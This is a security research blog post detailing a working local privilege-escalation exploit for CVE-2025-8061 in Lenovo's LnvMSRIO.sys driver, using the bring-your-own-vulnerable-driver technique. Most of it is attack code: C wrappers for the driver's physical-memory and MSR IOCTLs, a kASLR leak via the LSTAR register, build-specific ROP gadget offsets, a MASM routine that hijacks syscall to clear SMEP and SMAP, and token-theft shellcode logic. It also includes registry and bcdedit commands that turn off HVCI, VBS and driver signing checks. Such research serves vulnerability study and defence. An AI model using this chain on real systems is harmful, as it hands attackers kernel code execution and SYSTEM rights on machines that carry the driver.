weaponizing-byovd-and-privilege-escalation

The complete source code and all supporting components are in the project repository: CVE-2025-8061. This series was inspired by Quarkslab’s article BYOVD to the next level.

Overview

This post documents the full exploitation of CVE-2025-8061, a vulnerability in Lenovo’s MSR I/O driver (LnvMSRIO.sys). The technique is known as BYOVD (Bring Your Own Vulnerable Driver). Rather than writing a kernel exploit from scratch, we abuse a legitimate, Microsoft-signed driver that has a vulnerability. The driver is already trusted by Windows, so it loads cleanly. The vulnerability gives us the primitives we need.

The driver exposes four IOCTL codes with no access control, letting any unprivileged usermode process read and write physical memory and CPU MSR registers directly. From these primitives, we build a full Ring 0 code execution path and use it to steal the SYSTEM token.

The chain breaks into three stages:

Defeat kASLR: read the LSTAR MSR to leak KiSystemCall64, subtract a fixed offset, recover the kernel base
Gain kernel execution: overwrite LSTAR with a ROP gadget, fire a syscall, execute a token-theft payload
Escalate to SYSTEM: patch our process token, confirm with a system shell

Environment

Host, Fedora Linux: Code editing (VSCode), static analysis (IDA Pro), virtualization
WIN-DEV, Windows 10 22H2: Visual Studio 2022 + WDK, WinDbg kernel debugger
WIN-TARGET, Windows 11 24H2 (26100.1): Test target

WIN-TARGET was weakened as follows before any research began:

# Disable VBS and HVCI
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v EnableVirtualizationBasedSecurity /t REG_DWORD /d 0 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v HypervisorEnforcedCodeIntegrity /t REG_DWORD /d 0 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v Enabled /t REG_DWORD /d 0 /f

# Enable test signing and kernel debug
bcdedit /set testsigning on
bcdedit /debug on
bcdedit /dbgsettings net hostip:<WIN-DEV-IP> port:50000 key:1.2.3.4

Secure Boot was disabled at the QEMU firmware level by editing the VM XML:

<os firmware="efi">
  <type arch="x86_64" machine="pc-q35-10.1">hvm</type>
  <firmware>
    <feature enabled="no" name="enrolled-keys"/>
    <feature enabled="no" name="secure-boot"/>
  </firmware>
  <loader type="rom" format="qcow2">/usr/share/edk2/ovmf/OVMF.amdsev.fd</loader>
  <nvram template="/usr/share/edk2/ovmf/OVMF_VARS_4M.secboot.qcow2" templateFormat="qcow2" format="qcow2">/var/lib/libvirt/qemu/nvram/win11_VARS.qcow2</nvram>
  <boot dev="hd"/>
</os>

The Hyper-V vendor ID was also overridden to prevent KDNET from switching to an undocumented Hyper-V debug protocol:

<vendor_id state="on" value="KVMKVMKVM"/>

WinDbg connection confirmed over KDNET:

Note on scope: WIN-TARGET was intentionally weakened (test signing on, HVCI off, Defender off) to allow loading unsigned drivers without the BYOVD chain. This is the controlled research environment. The BYOVD -> DSE bypass chain demonstrates the same result on a hardened target; see Part 2.

Section 1 — Driver Analysis

Finding the IOCTL Dispatcher

DriverEntry registers one function for Create, Close, and DeviceControl:

drvobj->MajorFunction[0]  = sub_140001580;   // IRP_MJ_CREATE
drvobj->MajorFunction[2]  = sub_140001580;   // IRP_MJ_CLOSE
drvobj->MajorFunction[14] = sub_140001580;   // IRP_MJ_DEVICE_CONTROL

sub_140001580 dispatches to sub-handlers based on the IOCTL code. No caller authentication nor handle privilege checks. Any process that can open the device wins.

The four relevant codes:

0x9C406104: Physical memory read
0x9C40A108: Physical memory write
0x9C402084: MSR read
0x9C402088: MSR write

Physical Memory Read (0x9C406104)

After correcting types in IDA, the handler is revealed to first make a check:

if (InputBufferLength != 16) return STATUS_INVALID_PARAMETER;

So the input is exactly 16 bytes. The first field is passed directly to MmMapIoSpace as the first argument, confirming it’s a PHYSICAL_ADDRESS (8 bytes). Then there’s a size calculation:

NumberOfBytes = SystemBuffer->OperationType * SystemBuffer->HowMuch;
BaseAddress   = MmMapIoSpace(SystemBuffer->PhysicalAddress, NumberOfBytes, MmNonCached);

A switch on OperationType confirms valid values are 1, 2, or 8 (byte/word/qword copy variants). HowMuch is the element count. The struct:

typedef struct {
    UINT64 PhysicalAddress;  // physical address to map
    ULONG  OperationType;    // copy granularity: 1, 2, or 8
    ULONG  HowMuch;          // number of elements
} PHYS_READ_INPUT;           // sizeof == 16

The handler maps the physical address into kernel virtual space, copies OperationType × HowMuch bytes into the output buffer, unmaps, and returns. This lets any caller read arbitrary physical memory:

BOOL ReadPhysicalMemory(HANDLE hDevice, UINT64 physAddr, ULONG size, BYTE* outBuffer) {
    PHYS_READ_INPUT input = {
        .PhysicalAddress = physAddr,
        .OperationType   = 1,
        .HowMuch         = size
    };
    DWORD bytesReturned = 0;

    return DeviceIoControl(
        hDevice,
        IOCTL_READ_PHYS_MEM,       // 0x9C406104
        &input, sizeof(input),     // must be exactly 16 bytes
        outBuffer, size,
        &bytesReturned, NULL
    );
}

Normally, reading address 0x1000 from usermode would be refused. Through this IOCTL it goes through unchecked.

Physical Memory Write (0x9C40A108)

Same header struct, extended with a caller-supplied byte array. The handler maps the target physical address and copies Data into it:

typedef struct {
    UINT64 PhysicalAddress;
    ULONG  OperationType;
    ULONG  HowMuch;
    BYTE   Data[1];          // flexible array: payload bytes follow
} PHYS_WRITE_INPUT;

BOOL WritePhysicalMemory(HANDLE hDevice, UINT64 physAddr, BYTE* data, ULONG size) {
    ULONG totalSize = offsetof(PHYS_WRITE_INPUT, Data) + size;
    
    BYTE* inputBuf = (BYTE*)calloc(1, totalSize);
    if (!inputBuf) return FALSE;

    PHYS_WRITE_INPUT* input = (PHYS_WRITE_INPUT*)inputBuf;
    input->PhysicalAddress  = physAddr;
    input->OperationType    = 1;
    input->HowMuch          = size;
    memcpy(input->Data, data, size);

    DWORD bytesReturned = 0;
    BOOL success = DeviceIoControl(
        hDevice,
        IOCTL_WRITE_PHYS_MEM,
        inputBuf, totalSize,
        NULL, 0,
        &bytesReturned, NULL
    );

    free(inputBuf);
    return success;
}

Any usermode process can write arbitrary bytes to any physical address, in theory.

Section 2 — Physical Memory Primitives Hit a Wall

The natural first play is DKOM (Direct Kernel Object Manipulation). The plan: scan physical RAM for EPROCESS structures by pool tag, locate a target process, patch its ActiveProcessLinks (Flink/Blink) to unlink it from the process list, effectively hiding it from the OS. The scanner theoretically should run cleanly, but it hit a wall.

// Minimal EPROCESS overlay
#pragma pack(push, 1)
typedef struct {
    BYTE       _pad0[0x028];              // 0x000 skip to CR3
    UINT64     DirectoryTableBase;        // 0x028 physical address of page table
    BYTE       _pad1[0x1d0 - 0x030];      // skip to PID
    UINT64     UniqueProcessId;           // 0x1d0 PID
    LIST_ENTRY ActiveProcessLinks;        // 0x1d8 Flink + Blink (16 bytes)
    BYTE       _pad2[0x338 - 0x1d8 - 16]; // skip to name
    CHAR       ImageFileName[16];         // 0x338 null terminated, max 15 chars
} EPROCESS_OVERLAY;
#pragma pack(pop)

// EPROCESS scanner

// Scan one chunk of physical RAM for an EPROCESS matching targetName
// Returns physical base address of the EPROCESS, or 0 if not found
UINT64 ScanChunk(BYTE* chunk, UINT64 physBase,
                 ULONG size, const char* target) {

    for (ULONG i = 4; i < size - sizeof(EPROCESS_OVERLAY); i++) {

        // Look for pool tag 'Proc'
        if (*(UINT32*)(chunk + i) != EPROCESS_POOL_TAG)
            continue;

        // Pool tag is at byte 4 of the pool header
        // EPROCESS starts at: i - 4 (start of pool header) + 16 (header size)
        ULONG eprocOff = i - 4 + POOL_HEADER_SIZE;
        if (eprocOff + sizeof(EPROCESS_OVERLAY) > size)
            continue;

        // Cast the bytes directly to our overlay struct
        EPROCESS_OVERLAY* ep = (EPROCESS_OVERLAY*)(chunk + eprocOff);

        // Validate ImageFileName
        BOOL valid = TRUE;
        for (int c = 0; c < 15; c++) {
            char ch = ep->ImageFileName[c];
            if (ch == 0) break;
            if (ch < 0x20 || ch > 0x7E) { valid = FALSE; break; }
        }
        if (!valid) continue;

        // Check name match
        if (_strnicmp(ep->ImageFileName, target, 15) != 0)
            continue;

        UINT64 eprocPhys = physBase + eprocOff;
        printf("[+] Found '%s' | PID: %llu | Physical: 0x%llX\n",
            ep->ImageFileName,
            ep->UniqueProcessId,
            eprocPhys);

        return eprocPhys;
    }
    return 0;
}

UINT64 FindProcess(HANDLE hDev, const char* target) {
    printf("[*] Scanning physical RAM for '%s'...\n", target);

    UINT64 start     = 0x100000;     // skip legacy 1MB region
    UINT64 end       = 0x20000000;   // scan up to 512MB
    ULONG  chunkSize = 0x400000;     // 4MB per read

    BYTE* chunk = (BYTE*)malloc(chunkSize);
    if (!chunk) return 0;

    UINT64 result = 0;

    for (UINT64 addr = start; addr < end && !result; addr += chunkSize) {
        printf("\r[*] 0x%llX / 0x%llX", addr, end);
        fflush(stdout);

        if (!ReadPhysicalMemory(hDev, addr, chunkSize, chunk))
            continue;

        result = ScanChunk(chunk, addr, chunkSize, target);
    }

    free(chunk);
    printf("\n");
    return result;
}

// DKOM unlink
BOOL UnlinkProcess(HANDLE hDev, UINT64 eprocPhys) {

    // Read the full overlay to get Flink, Blink, and name
    EPROCESS_OVERLAY ep = { 0 };
    if (!ReadPhysicalMemory(hDev, eprocPhys, sizeof(ep), &ep)) {
        printf("[-] Failed to read EPROCESS\n");
        return FALSE;
    }

    UINT64 flinkVirt = (UINT64)ep.ActiveProcessLinks.Flink;
    UINT64 blinkVirt = (UINT64)ep.ActiveProcessLinks.Blink;

    return TRUE;
}

Why this brute force crashed

Non-existent or reserved ranges in the VM’s physical layout have no valid PFN entry. Dereferencing a mapping into those pages is undefined behavior at the hardware level.
Cache type conflicts: MmMapIoSpace takes a MEMORY_CACHING_TYPE parameter. If a physical page already has an existing mapping with a different cache type, a second conflicting mapping causes a hardware-level cache consistency violation and immediately bugchecks. This is documented in exploit PoC notes for similar drivers.
Our driver does not check the return value of MmMapIoSpace. When the call fails or returns NULL, our code dereferences the null pointer, which is itself a kernel panic independent of any PFN logic.

The primitive itself works correctly. The fundamental problem is that MmMapIoSpace takes a physical address, but everything we know about the kernel (exported symbols, leaked pointers, EPROCESS locations) is expressed as virtual addresses. Without a reliable VA->PA translation, we are flying blind.

The 1803 patch closed the historical way of doing that translation (mapping PTEs to walk the page tables manually). So the read/write primitive in isolation gives us a hammer with no way to know what we are hitting. Outflank describes this as the core obstacle: acquiring MmMapIoSpace access is the easy part; the hard part is always the VA->PA mapping.

Section 3 — MSR Primitives

What is an MSR? Model-Specific Registers are 64-bit CPU registers that control processor features and expose system state: power management, performance counters, syscall configuration, and more. They’re accessed with the privileged instructions RDMSR and WRMSR. From Ring 3, either instruction raises #GP (General Protection Fault) immediately. It’s hardware enforcement not software policy.

The driver runs in Ring 0 and exposes both via IOCTL.

MSR Read (0x9C402084)

The handler, simplified from IDA:

v6[0] = __readmsr(SystemBuffer->Register);
store_to_out(OutputBuffer, 8, v6, 8);
*BytesReturned = 8;
return STATUS_SUCCESS;

Input is four bytes, just the MSR register number. Output is the 64-bit MSR value. The input struct:

typedef struct {
    ULONG Register;
} MSR_READ_INPUT;

UINT64 ReadMSR(HANDLE hDevice, ULONG msrRegister) {
    MSR_READ_INPUT input = { msrRegister };
    UINT64 result = 0;
    DWORD bytesReturned = 0;

    BOOL ok = DeviceIoControl(
        hDevice,
        IOCTL_READ_MSR,
        &input, sizeof(input),
        &result, sizeof(result),
        &bytesReturned, NULL
    );

    if (!ok) {
        printf("[-] ReadMSR failed. Error: %lu\n", GetLastError());
        return -1;
    }

    return result;
}

Defeating kASLR via LSTAR

What is kASLR? Kernel Address Space Layout Randomization randomizes the base address of ntoskrnl.exe on every boot. Without it, ROP gadgets, function pointers, and kernel structures sit at known addresses that an attacker can hardcode. With it, none of those addresses are predictable, an attacker needs to leak a kernel pointer first.

What is LSTAR? LSTAR (0xC0000082) is the MSR the CPU reads on every SYSCALL instruction. It holds the virtual address of KiSystemCall64, the kernel’s syscall entry point, which lives inside ntoskrnl.exe at a fixed offset from the kernel base.

KiSystemCall64 is at a fixed offset from the kernel base:

kernelBase = LSTAR - KiSystemCall64_offset

We can find the offset for our build 26100.1 using WinDbg:

kd> ? nt!KiSystemCall64 - nt
Evaluate expression: 6743616 = 00000000`0066e640

How could we leverage this? One IOCTL call leaks the LSTAR, KiSystemCall64 absolute address. And since we have its RVA, kASLR is done. The kernel base address is easily computed. This value will be very important later when constructing the ROP chain.

MSR Write — An Alignment Trap (0x9C402088)

The write handler calls:

__writemsr(SystemBuffer->Register, *&SystemBuffer->Value);

The expression *&SystemBuffer->Value takes the address of Value at offset 0x04 and dereferences it as a 64-bit pointer, reading 8 bytes starting at +0x04. IDA’s auto-recovered struct showed Value as ULONG (4 bytes). That’s wrong, and it caused a silent failure.

The actual memory layout the driver expects:

Offset 0x00:  ULONG   Register   (4 bytes MSR index)
Offset 0x04:  ULONG   [low bits] (4 bytes low 32 bits of MSR value)
Offset 0x08:  ULONG   [hi bits]  (4 bytes high 32 bits of MSR value)

// compiler inserts 4 bytes of alignment padding
typedef struct {
    ULONG  Register;
    // [4 bytes of compiler padding here, UINT64 must be 8-byte aligned]
    UINT64 Value;
} MSR_WRITE_INPUT;

With natural alignment, the compiler places UINT64 at offset 0x08, not 0x04. The driver reads 8 bytes at offset 0x04, it gets the padding zeros as the low 32 bits and the value’s own low 32 bits as the high 32 bits. The write lands scrambled. DeviceIoControl returns ERROR_GEN_FAILURE (error 31) and it took a while to figure out why.

The fix is #pragma pack(push, 1), which tells the compiler to emit fields back-to-back with no implicit padding:

// pack(1) suppresses padding; Value lands at offset 0x04
#pragma pack(push, 1)
typedef struct {
    ULONG  Register;   // offset 0x00
    UINT64 Value;      // offset 0x04, exactly where the driver dereferences
} MSR_WRITE_INPUT;
#pragma pack(pop)

BOOL WriteMSR(HANDLE hDevice, ULONG msrRegister, UINT64 value) {
    MSR_WRITE_INPUT input = { msrRegister, value };
    DWORD bytesReturned = 0;
    
    BOOL ok = DeviceIoControl(
        hDevice, 
        IOCTL_WRITE_MSR,
        &input, sizeof(input),
        NULL, 0,
        &bytesReturned, NULL
    );
    
    if (!ok) {
        printf("[-] WriteMSR failed. Error: %lu\n", GetLastError());
    }
    return ok;
}

The UINT64 now sits at offset 0x04, so when the driver dereferences 8 bytes at +0x04 it gets the full MSR value, low and high 32 bits in the correct order.

We validate it against IA32_TSC_AUX (0xC0000103), the timestamp counter auxiliary register. It’s safe to write (no effect on execution or scheduling), and reading it back confirms round-trip fidelity:

Section 4 — SMAP: Effectively Unarmed

What is SMAP? Supervisor Mode Access Prevention prevents Ring 0 code from reading or writing usermode (Ring 3) memory pages. It’s controlled by bit 21 of CR4. When armed, any kernel access to a user page triggers a fault, unless RFLAGS.AC (bit 18, the Alignment Check flag) is set to 1, which temporarily suspends the protection.

The CVE documentation mentioned that AC can be flipped from usermode to bypass SMAP prior to triggering the vulnerable IOCTL. But it got me thinking: would KiSystemCall64, the normal syscall path, have cleared AC on entry anyway, effectively re-arming SMAP before execution ever reached the driver?

It’s a legitimate question, and not just academic. If flipping AC from usermode is all it takes to neuter SMAP, how strong is the protection really? The answer matters in a different exploit scenario, one without an MSR write primitive, relying instead on a normal syscall through KiSystemCall64. Does that path contain a CLAC somewhere in its prologue that would close this door?

The SYSCALL instruction itself masks RFLAGS on entry using the value in IA32_FMASK (0xC0000084). Any bit set there gets cleared on every syscall. Checking it in WinDbg:

kd> rdmsr 0xC0000084
msr[c0000084] = 00000000`00004700

0x4700 covers bits 10, 11, and 14: IF, DF, and a couple of others. Bit 18 (0x40000), the AC flag, is not set. So SYSCALL leaves AC untouched.

Test 1 — Is it Cleared Somewhere in the Function Prologue?

A minimal test driver reads RFLAGS at the very first instruction of IOCTL dispatch and prints bit 18:

NTSTATUS DeviceControl(PDEVICE_OBJECT DeviceObject, PIRP Irp) {
    unsigned __int64 current_rflags = __readeflags();

    DbgPrint("Current RFLAGS: 0x%llX\n", current_rflags);

    if (current_rflags & 0x40000)
        DbgPrint("[!] SMAP BYPASSED: AC bit survived the journey!\n");
    else
        DbgPrint("[*] SMAP ACTIVE: AC bit was cleared by kernel routing.\n");

    DbgBreakPoint();
    // ...
}

The usermode caller explicitly sets AC before the syscall via a small MASM stub:

SetAcBit PROC
    pushfq
    bts qword ptr [rsp], 18   ; set bit 18 (AC)
    popfq
    ret
SetAcBit ENDP

SetAcBit();    // flip AC in usermode
DeviceIoControl(hDevice, IOCTL_TEST_SMAP, ...);   // syscall into kernel

AC survived. No instruction anywhere in KiSystemCall64 cleared it.

Test 2 — Does That Mean SMAP Is Actually Bypassed?

The next question is whether AC=1 in the kernel actually suppresses a SMAP fault when raw user memory is dereferenced. A second driver checks both CR4[21] (SMAP armed) and RFLAGS[18] (AC state) on entry, then directly dereferences a usermode pointer passed in by the caller:

unsigned __int64 cr4_val   = __readcr4();
unsigned __int64 rflags_val = __readeflags();

int smap_bit = (cr4_val   >> 21) & 1;
int ac_bit   = (rflags_val >> 18) & 1;

DbgPrint("CR4:    0x%llX -> SMAP bit (21): %d\n", cr4_val,    smap_bit);
DbgPrint("RFLAGS: 0x%llX -> AC bit   (18): %d\n", rflags_val, ac_bit);

if (smap_bit == 1 && ac_bit == 1)
    DbgPrint("[!] SMAP armed, but AC=1 overrides it. No crash expected.\n");

// THE TRIPWIRE
volatile char testRead = *(volatile char*)UserModePointer;
DbgPrint("[!] NO BSOD. Read value: %c\n", testRead);

The usermode client passes a pointer to a stack-allocated string and never touches AC:

char mySecret[] = "X";
PVOID userPtr   = mySecret;
DeviceIoControl(hDevice, IOCTL_CRASH_TEST, &userPtr, sizeof(userPtr), NULL, 0, &bytesReturned, NULL);

No crash, and the AC bit was already 1 before SetAcBit() was even called. The kernel arrived at the driver with AC pre-set by default.

Test 3 — Is This a VM Artifact?

Maybe the hypervisor is doing something unusual with RFLAGS. To rule that out, the driver was extended to forcefully clear AC and then attempt the same dereference:

// Force AC to 0
__writeeflags(__readeflags() & ~0x40000ULL);

unsigned __int64 forced_rflags = __readeflags();
DbgPrint("Post-enforcement RFLAGS: 0x%llX -> AC bit: %d\n",
    forced_rflags, (forced_rflags >> 18) & 1);

// Same dereference
volatile char testRead = *(volatile char*)UserModePointer;

System crash. Clearing AC re-armed SMAP, and the dereference immediately faulted. So SMAP is real and functional, it’s just that the AC bit arrives in the kernel set by default, making it effectively pre-bypassed on every normal IOCTL path.

Conclusion

On Windows 11 without HVCI, SMAP provides no meaningful protection against a kernel-mode attacker. The AC bit survives the syscall transition unmodified, IA32_FMASK doesn’t cover it, and KiSystemCall64 doesn’t clear it. The IOCTL dispatch path enters driver code with AC=1 by default, pre-disarming SMAP before any attacker interaction.

Furthermore, Ring 0 code can freely manipulate RFLAGS.AC, so even if AC arrived at 0, any attacker with kernel execution can set it in a single instruction.

Without HVCI, SMAP is security theater. With HVCI, the hypervisor is doing the real work and SMAP is redundant. Either way, it’s not a meaningful barrier.

For the exploit, we make sure AC=1 in the forged RFLAGS, but as confirmed above, it’s already there.

Section 5 — Bypassing SMEP with ROP

What is SMEP? Supervisor Mode Execution Prevention prevents Ring 0 from executing pages marked as user-mode. Bit 20 of CR4. Our shellcode lives in a VirtualAlloc’d RWX buffer in user space. Without disabling SMEP, the CPU faults the moment the instruction pointer enters it.

What is ROP? Return-Oriented Programming builds a chain of small instruction sequences (gadgets) already present in the kernel image, each ending in ret. Because the gadgets are at kernel addresses, SMEP doesn’t block them. By carefully controlling the stack, each ret chains to the next gadget, ultimately doing something useful. In this case, writing CR4 to disable both SMAP and SMEP.

Gadget Selection

rp++ --va 0 --rop 3 -f ntoskrnl.exe > rop.txt

Required gadgets and their offsets from kernel base on build 26100.1:

swapgs ; iretq (0xb55c22): Transition to kernel context via hardware frame
pop rcx ; ret (0x717c79): Load forged CR4 value into RCX
mov cr4, rcx ; ret (0x442c07): Write CR4, clearing SMEP + SMAP
swapgs ; sysret ; ret (0xb55e19): Re-enable SMEP on the way out

Why iretq Instead of ret

There are no swapgs ; ret gadgets, only swapgs ; iretq. This matters because iretq (Interrupt Return, 64-bit) doesn’t just pop RIP. Per the Intel SDM, it pops a five-value hardware frame:

+00: RIP       <- where to resume
+08: CS        <- code segment selector
+10: RFLAGS    <- processor flags to restore
+18: RSP       <- stack pointer to restore
+20: SS        <- stack segment selector

All five must be valid and carefully forged. For kernel Ring 0 execution: CS = 0x10, SS = 0x18. RFLAGS must include AC=1. RSP must point to the remainder of our gadget chain.

CR4 Target Value

For now, we’ll read the original value from WinDbg on the target:

kd> r cr4
0x350ef8

SMEP is bit 20 (0x100000), SMAP is bit 21 (0x200000), we clear both.

UINT64 CR4_original      = 0x350ef8;
UINT64 CR4_smep_smap_off = CR4_original & ~0x300000ULL;  // = 0x050ef8

Stack Layout

The PrepareStack MASM function builds the full stack before issuing syscall, which diverts to the ROP chain via the overwritten LSTAR:

.code
PUBLIC PrepareStack
PrepareStack PROC
    push    rbp
    mov     rbp, rsp
    push    r12 / r13 / r14 / r15 / rbx ; save non-volatiles

    ; Save original RFLAGS
    pushfq
    pop     rbx

    ; Read function arguments
    mov     r12, rcx            ; shellcode
    mov     r13, rdx            ; pop rcx ; ret
    mov     r14, r8             ; mov cr4, rcx ; ret
    mov     r15, r9             ; CR4 value

    ; Align stack to 16 bytes; iretq requires this
    and     rsp, -10h

    ; Push gadget chain data (what new_RSP points at after iretq)
    push    r12                 ; shellcode
    push    r14                 ; mov cr4, rcx ; ret
    push    r15                 ; CR4 value
    ; new_RSP = current RSP (points at CR4 value)
    mov     rcx, rsp

    ; Push iretq frame
    push    18h                 ; SS
    push    rcx                 ; new RSP
    
    mov     rax, rbx
    btr     rax, 9        ; Bit 9 is IF (Interrupt Flag). btr clears it to 0.
    bts     rax, 18       ; Bit 18 is AC (Alignment Check). bts sets it to 1.
    push    rax           ; poped later by iretq
    push    rax           ; push modified RFLAGS on stack
    popfq                 ; load modified RFLAGS from stack

    push    10h                 ; CS
    push    r13                 ; RIP = pop rcx ; ret

    ; Fire the exploit
    lea r12, after_syscall ; Put the return address in R12
    syscall                ; LSTAR jumps to ROP -> Shellcode

after_syscall:
    ; restore saved registers
    ...
    ret
        
PrepareStack ENDP
END

Execution flow after syscall: LSTAR now points to swapgs ; iretq. iretq consumes the frame (CS=0x10, RFLAGS with AC=1, RSP to chain data, SS=0x18, RIP=pop rcx ; ret). Then: pop rcx loads CR4_smep_off, mov cr4, rcx disables SMEP+SMAP, ret jumps to shellcode.

Section 6 — The Shellcode: Token Theft

With SMEP off and Ring 0 execution confirmed, the payload walks KTHREAD -> EPROCESS -> ActiveProcessLinks to find System (PID 4) and copies its security token to our process.

What is token theft? Every Windows process has a security token that defines what it can do: user SID, privileges, integrity level. The kernel’s System process runs with the most privileged token possible. By overwriting our process’s token pointer with System’s token pointer, we inherit those privileges without spawning a new process or touching LSASS.

Logic (Pseudocode)

KTHREAD  = gs:[0x188];                         // current thread
EPROCESS = KTHREAD + KTHREAD_EPROCESS_OFFSET;  // our EPROCESS
our_proc = EPROCESS;
walker   = EPROCESS;

// Walk the doubly-linked EPROCESS list
do {
    walker = walker->ActiveProcessLinks.Flink - EPROCESS_LINKS_OFFSET;
} while (walker->UniqueProcessId != 4);        // PID 4 == System

// Steal System's token, preserve the low nibble (reference count)
our_proc->Token = walker->Token & ~0xFULL;

The shellcode is built dynamically from raw opcodes in the exploit binary before execution. This lets us embed the LSTAR value, gadget addresses, and kernel base directly at runtime without a separate compiled blob.

Before returning, the shellcode: restores LSTAR to the original KiSystemCall64 address (future syscalls must work), restores SMEP+SMAP via a second ROP stub, and returns to usermode via swapgs ; sysret.

We should note that for the exploit to work, our process should be locked to one core, and have the highest priority of execution.

SetProcessAffinityMask(GetCurrentProcess(), 1); 
SetThreadAffinityMask(GetCurrentThread(), 1);

MSRs (Model Specific Registers) are per-logical-core.

There is not just one global LSTAR register for the whole computer; every single CPU core has its own LSTAR register. When the vulnerable driver executes the wrmsr instruction, it only overwrites the LSTAR register on the specific CPU core it happens to be running on at that exact millisecond.

Setting the affinity mask to 1 (which is a bitmask 00000001 representing Core 0) forces both program and the resulting driver execution to stay glued to Core 0.

SetPriorityClass(GetCurrentProcess(), REALTIME_PRIORITY_CLASS);
SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_TIME_CRITICAL);

The next setup, making our process max priority, is to prevent a catastrophic system crash caused by a context switch.

Once LSTAR is overwritten on Core 0, Core 0 is effectively a “poisoned” core. The next time any process running on Core 0 calls syscall, the CPU will jump to swapgs; iretq gadget.

The exploit relies on PrepareStack MASM function setting up the registers and stack exactly right before calling syscall. But Windows is a highly concurrent OS. Thousands of background threads are executing system calls every second.

By setting the priority to REALTIME_PRIORITY_CLASS and THREAD_PRIORITY_TIME_CRITICAL, we are telling the Windows scheduler: “Do not interrupt this thread for anything. Give me 100% of this CPU core’s attention until I say otherwise.” This minimizes the window for another process to steal the CPU and step on the poisoned LSTAR mine.

Conclusion

Starting from a vulnerable Lenovo driver with no access control, this post walked through a complete Ring 0 code execution chain on Windows 11 24H2:

kASLR defeated: one IOCTL call to read LSTAR, one subtraction to recover the kernel base.
Physical memory brute-force abandoned: virtual-to-physical mapping is non-deterministic; MSR primitives are more reliable.
SMAP found pre-bypassed: AC=1 survives the syscall transition by default; no explicit bypass needed.
SMEP defeated via ROP: kernel gadgets flip CR4 bits 20 and 21 before our shellcode executes.
Privilege escalation complete: token theft via ActiveProcessLinks walk promotes our process to NT AUTHORITY\SYSTEM.

We now have the most privileged token on the system and have successfully proven our Ring 0 execution primitive. It feels great, but let’s be honest with ourselves: our exploit is currently a glass cannon.

Right now, we are relying heavily on hardcoded kernel offsets, static RVA values to bypass kASLR, and a machine-specific CR4 state. If you take this exact executable and run it on a coworker’s laptop, or even just install a minor Windows update on your own machine, the offsets will shift and the target system will instantly Blue Screen.

In Part 2, we will transform this fragile Proof of Concept into a fully weaponized, portable exploit. We will throw away the hardcoded addresses and build a 100% dynamic chain. We will engineer a user-mode PE scanner to locate our ROP gadgets on the fly, construct a Ring 0 payload to leak the machine’s native CR4 register, and implement dynamic shellcode patching to navigate the ever-changing _EPROCESS structures across different Windows 10 and 11 builds.

> Next: engineering-a-fully-dynamic-exploit

Mail sent successfully!

Thanks — I'll reply soon.

weaponizing-byovd-and-privilege-escalation

Overview

Environment

Section 1 — Driver Analysis

Finding the IOCTL Dispatcher

Physical Memory Read (0x9C406104)

Physical Memory Write (0x9C40A108)

Section 2 — Physical Memory Primitives Hit a Wall

Why this brute force crashed

Section 3 — MSR Primitives

MSR Read (0x9C402084)

Defeating kASLR via LSTAR

MSR Write — An Alignment Trap (0x9C402088)

Section 4 — SMAP: Effectively Unarmed

Test 1 — Is it Cleared Somewhere in the Function Prologue?

Test 2 — Does That Mean SMAP Is Actually Bypassed?

Test 3 — Is This a VM Artifact?

Conclusion

Section 5 — Bypassing SMEP with ROP

Gadget Selection

Why iretq Instead of ret

CR4 Target Value

Stack Layout

Section 6 — The Shellcode: Token Theft

Logic (Pseudocode)

Conclusion

Leave a Comment